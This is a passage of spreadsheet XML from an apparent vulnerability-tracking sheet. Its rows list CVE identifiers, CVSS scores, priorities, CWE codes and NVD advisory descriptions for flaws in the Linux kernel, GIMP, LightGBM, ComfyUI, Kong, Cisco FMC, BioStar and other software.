another CPU take the same slot lock; an access time value with that bit
set makes the slot look locked forever.
Shift the lock bit into the flags half of the word on big-endian 64-bit.</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90043</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90044</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_fs: Fix Use-After-Free in AIO error path
In ffs_epfile_write_iter() and ffs_epfile_read_iter(), when ffs_epfile_io()
fails with an error other than -EIOCBQUEUED, the io_data structure (`p`) is
freed. However, for AIO operations, the kiocb cancel function was already
armed and kiocb-&gt;private was set to `p`.
If a concurrent cancel operation (such as sys_io_cancel()) executes after
ffs_epfile_io() fails but before the function frees `p`, a Use-After-Free
can occur when the cancellation handler accesses the freed pointer.
To securely fix this race condition, we must properly un-arm the
cancellation. Invoking `kiocb-&gt;ki_complete()` does exactly this by
acquiring `ctx-&gt;ctx_lock` and safely removing the kiocb from the active
sequence. In doing so, it ensures that a parallel io_cancel can no longer
discover the kiocb, effectively closing the race window.
We then return -EIOCBQUEUED to notify the VFS layer that the kiocb has been
consumed and it should avoid attempting to complete the request again or
triggering subsequent completion handlers.</t>
        </is>
      </c>
      <c r="S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90044</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90045</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
USB: gadget: ffs: fix mm lifetime handling
io_data stores a pointer to the submitting task's mm_struct,
but does not currently hold a reference to it while async
requests are pending.
This can result in a use-after-free if the task exits before
completion handling finishes.
Take a reference with mmgrab() when queuing the read request
and release it with mmdrop() on request completion.</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90045</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90046</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/page_alloc: don't spin_trylock() in NMI on UP
Patch series "mm/page_alloc: fixes for free_pages_nolock() on RT/UP".
Pre-existing bugs found by Sashiko during review of this other series:
https://lore.kernel.org/all/20260703-alloc-trylock-v5-0-c87b714e19d3@google.com/
I have not reproduced these bugs, and I suspect there is no real-world
user that is affected by them.
This patch (of 2):
As noted in can_spin_trylock(), using this is unsafe in this context. 
commit 620b46ed6ae17 ("mm/page_alloc: return NULL early from
alloc_frozen_pages_nolock() in NMI on UP") fixed this on the alloc side
but missed the free side.
Impact: If BPF programs using these features in NMI (probably tracing) are
present on non-SMP builds this might crash the kernel and is probably
exploitable by local attackers for privilege escalation.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90046</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90047</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Don't hand out the flat CCS storage as usable VRAM
get_flat_ccs_offset() reads the base of the flat CCS storage from the
hardware, scales it by the number of enabled L3 nodes, and rounds the
result up to 128K.  Everything below that offset is then handed to the
VRAM allocator as usable memory.
Rounding a limit that means "usable memory ends here" upwards publishes
whatever lies between the real base and the rounded one as free memory,
and that memory belongs to the compression hardware.  The scaled value
has no reason to be 128K aligned, and on a Battlemage G21 with 16 GiB it
is not:
	flat CCS base: raw 0x3fafff800, rounded 0x3fb000000
so the last 2 KiB of page 0x3fafff000 is CCS storage, in the allocator's
pool.  Whatever is allocated there gets that tail overwritten by the
compression hardware, which needs no page-table entry, no buffer object
and no GPU submission to do it, and does it before userspace exists.
On this machine a Mesa VM's level-3 page table landed on that page on
every cold boot.  It lost the entry covering the compositor's
batch-buffer heap, so the compositor's first submission faulted fetching
its batch and gdm restarted it forever: a black screen on an otherwise
working machine.  Restarting gdm cleared it because the next VM's page
tables were allocated somewhere else.
Round down instead, to the page size the allocator works in.  On this
machine that excludes exactly one page.
Reading the reserved page afterwards shows what had been writing it:
	[369] 0xcccc000000000000
	[371] 0xcc77000000000000
	[373] 0xcccc000000000000
	[375] 0xcc77000000000000
compression metadata, two bytes per sixteen, sitting where the driver
used to hand out memory.
The assertion that should have caught this compares the offset against
GSMBASE - ccs_size for equality.  That value is 128K aligned, so it
agrees with the rounded-up offset precisely when the base is not
aligned - the check cannot fail in the case it exists to catch, and is
compiled out unless CONFIG_DRM_XE_DEBUG is set.  Replace it with one
that can fail: CCS storage must not run into GSM.
[ And this was a debug session from hell, enormously helped by an AI
  doing much of the grunt-work.
  I'd like to call it my tireless helper, but the AI several times
  stated flat out that this was impossible and unsolvable and that we
  should just write a report about it.
  I suspect those things have been trained by people who may not be
  quite as stubborn as I am.
  But while the AI was ready to give up several times, it did keep
  adding debug code and analyzing it faithfully when I pushed. So credit
  where credit is due and I let the AI write the commit message above.
  This is basically a one-liner fixing a bogus "round_up()" to a
  "round_down()", but there were 24 patches adding more and more debug
  information to this, and 18 kernel boot to finally narrow it down to
  this.   - Linus ]</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90047</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90947</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP. When processing a specially crafted lighting preset file, the Lighting Effects filter does not properly validate the number of light sources. This can lead to an out-of-bounds write, corrupting memory. An attacker could exploit this by convincing a user to open a malicious preset file, potentially causing a crash or enabling arbitrary code execution.</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90947</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90948</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP's ICO file loader. When processing an ICO file containing an embedded PNG image, an integer overflow can occur during the calculation of the required buffer size. This leads to an undersized buffer being allocated, causing a heap-based buffer overflow when the decoded pixel data is written. A remote attacker could exploit this by crafting a malicious ICO file, which, when opened, could lead to arbitrary code execution or a crash.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90948</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90949</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP's PSP (Paint Shop Pro) file loader. When processing a compressed selection channel, a heap-based buffer overflow can occur due to a mismatch between the allocated buffer size and the amount of data decompressed. A remote attacker could exploit this vulnerability by crafting a malicious PSP file. Opening this file in GIMP could lead to a crash or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90949</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92786</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>LightGBM through 4.7.0 fails to validate child and split array values when parsing text models, allowing attackers to write out-of-bounds memory during SHAP prediction. Attackers can craft malicious model files with invalid node references that trigger out-of-bounds writes at attacker-chosen offsets in the leaf_depth_ buffer during feature contribution computation.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92786</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92816</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>ComfyUI before 0.30.0 fails to sanitize folder_name input in dataset save nodes, allowing attackers to write files to arbitrary paths outside the output directory. Attackers can load a crafted workflow that writes attacker-controlled content to arbitrary locations, enabling code execution through modified startup files or package initializers.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92816</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14916</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>A JWT signature verification vulnerability affects Kong components that perform JWT validation for MCP OAuth2 or DataKit integrations inside Kong API Gateway Enterprise. The affected code does not properly validate that the JWT signing algorithm is compatible with the type of key used for verification.
As a result, an unauthenticated remote attacker may be able to craft a forged JWT that is incorrectly accepted as valid, leading to authentication bypass and potential compromise of confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14916</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14917</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>A SAML authentication bypass vulnerability affects the Kong SAML plugin when the validate_assertion_signature option is explicitly set to false. This option is enabled by default. When disabled, the plugin may extract the SAML identity from an unsigned assertion and authenticate the user without verifying a valid cryptographic signature.
As a result, an unauthenticated remote attacker may be able to submit a crafted SAML response and impersonate arbitrary users, including administrators</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14917</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16432</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage PxXMLInput operator could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection.</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16432</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20342</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a specific file download API of Cisco Secure FMC Software could allow an authenticated, remote attacker to download arbitrary files from an affected system.
This vulnerability exists because user input is not being sanitized. An attacker could exploit this vulnerability by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from the affected system.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20342</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29811</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 2.4.4 attempts to detect an "alais" domain (i.e., a second domain that serves the same content as a primary domain; normally spelled "alias") via an ORM query filter rather than a Python "if" statement.</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29811</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31278</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>An issue in the /api/v2/setting/adserversetting endpoint of Suprema BioStar 2 before 2.9.12 and and BioStar X before 1.0.2 allows attackers to obtain Active Directory service account credentials in cleartext by supplying a crafted GET request.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31278</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61595</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>7.7</v>
